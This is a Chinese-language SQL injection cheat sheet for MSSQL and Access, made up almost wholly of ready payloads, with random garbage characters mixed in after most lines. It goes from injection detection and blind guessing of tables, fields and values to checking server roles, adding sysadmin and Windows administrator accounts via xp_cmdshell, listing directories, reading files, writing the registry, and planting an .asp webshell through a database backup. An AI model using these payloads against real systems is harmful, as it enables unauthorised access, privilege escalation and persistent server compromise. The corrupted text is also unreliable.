1.判断是否有注入;and 1=1 ;and 1=2 D}Ilyk_uUw
2.初步判断是否是mssql ;and user>0 �P,gdn�V
^
g�M��;}#>6
3.注入参数是字符'and [查询条件] and ''=' cd��;NpN��
PBks`
|�+
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �%>Xr5<$:&
Mu_i$j$vvP
5.判断数据库系统 �!Q-wdzsp?
BX�;5�wKfA
;and (select count(*) from sysobjects)>0 mssql ,$r2g�r!_G
�BH0!�6O�q
;and (select count(*) from msysobjects)>0 access SP�
2� 8�
.
�,NB( s`
Ap�Py]IdwX
��� *2u
E�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?SY<~i<K-
���#`GbHxd
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �)&W|QH=AI
Q�882B1�H�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 0/�]_�n�d
](r
^.�k,R
9.(1)猜字段的ascii值(access) F��N"rZW�M
2]jPv���0u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;n�p_%�?is
[�ET6(_=�b
(2)猜字段的ascii值(mssql) �(�(�3t:�
&jts�:^N>�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �U�FZ"C�,�
% m��n �/>
10.测试权限结构(mssql) 4sY[�a��z�
_[E�\���=�
;?6>m�h(�`
�"����!&B4
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- #-�x@�"�+z
\v`#�|�lT$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- t�/:�w1rw�
>7-y#SkXdo
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- J�6|J��W�p
N2~$r�pU3�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- &z�N@5m$k;
�<� tQc�_
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��%<�U�{K;
�IlHY%8F�{
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;�e;\q;�GP
0M�!0JJy#*
;and 1=(select IS_MEMBER('db_owner'));-- >�a�]�t��<
�5g�NL��O\
������{;RF
7�Jx%JgF��
11.添加mssql和系统的帐户 |�QY�ZRz��
iPU%� /_>�
;exec master.dbo.sp_addlogin username;-- �{'IFWD.�5
;exec master.dbo.sp_password null,username,password;-- RWE~&w G}�
#\b� ��;2>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- yis�LypM*
hPPB4�5^�
;exec master.dbo.xp_cmdshell 'net user username password [�_�%,6e+�
�G�]lvHD��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 9��--�dRTG
��"��]<}Hy
;exec master.dbo.xp_cmdshell 'net user username password /add';-- F"BL�#g66
Yq0#� #_�_
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- }�N�|�\� �
�n#�>5?�W�
D��Q�5W�6W
��cj^��b�h
12.(1)遍历目录 F�Q##�3�97
)OU�U�]MUH
;create table dirs(paths varchar(100), id int) P�!�>g�7X�
�i� �puo�}
;insert dirs exec master.dbo.xp_dirtree 'c:\' P C��sK(�)
.D3`'K3t{[
;and (select top 1 paths from dirs)>0 wi�BuEaUkW
��]-�EN/V
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &E]"c]i��+
�'RQ�iLU�F
&NP6%}b�R`
�+�U=K��Xv
(2)遍历目录 h&$�P���y�
"��s;ci�~$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �9F)W19i�.
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �H` Lu�"EK
]�gH��Lcr3
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 h�{H]xe[Q�
rT<�1S?jR�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 'v�+96b/;�
XJ\_�V[WA
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 U�5clQiow�
X_!�$Pk7ma
g6`.qyVfz'
�}M="oN~w�
13.mssql中的存储过程 b�8e�*P�v/
v'$yk�Z!�Z
xp_regenumvalues 注册表根键, 子键 �W7T�"�d4
>!<V\
Fj1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��cY^Y!.�,
b��2W;��|
xp_regread 根键,子键,键值名 �Qv7��4?B@
4(;20(q��]
;exec xp_regread ]svw
CPu C
gi
'^q�i2�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 F-i&�M1�\_
n�T)~w
�s
xp_regwrite 根键,子键, 值名, 值类型, 值 8db6(Q~�P�
ve�vx�|<9,
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 |})rt5|f1!
(s.����o��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 KM E�XT�$p
m/cx|b3hqv
xp_regdeletevalue 根键,子键,值名 % ghJ*i�HR
}��&=u�Z:
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 rC~_:uXtE�
5,��Qy/t}K
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %j�pH:-8'2
�YAL��yZ.d
�'\4c �"Ho
���Xk;Uk�[
14.mssql的backup创建webshell /��Lj%A���
yFIl^Ck%��
use model hLCs�QYNDU
��{P�,>Q4N
create table cmd(str image); t�vv[$�b&
�.Y�dr�[�
insert into cmd(str) values (''); g6�HphRJ5s
9$n+�-G�SK
backup database model to disk='c:\l.asp'; 4,o
%e,z�
?]759,Q3�L
ccIDMJ=2��
!^���n1�
15.mssql内置函数 tuX =�o�
5+�o
2 T]�
;and (select @@version)>0 获得Windows的版本号 �S5zp�UF=�
� >c�C G�x
;and user_name()='dbo' 判断当前系统的连接用户是不是sa >|y�>e�{�P
vQ?�M�M&6�
;and (select user_name())>0 爆当前系统的连接用户 -9�hp+0 <�
B:B0p+$I�
;and (select db_name())>0 得到当前连接的数据库 �~��5x4�?2
�m�4wPu��W
�U&�tf�l�/
f>.�`�xC�{
16.简洁的webshell ��GGYX!=]~
^p�{A�!I!�
use model V,99N'�o~x
��m9��\@kA
create table cmd(str image); �v4nv��Z6�
�=vB]�*?;9
insert into cmd(str) values (''); $%N;d>[�U,
I�Bn'iE�[>
backup database model to disk='g:\wwwtest\l.asp';
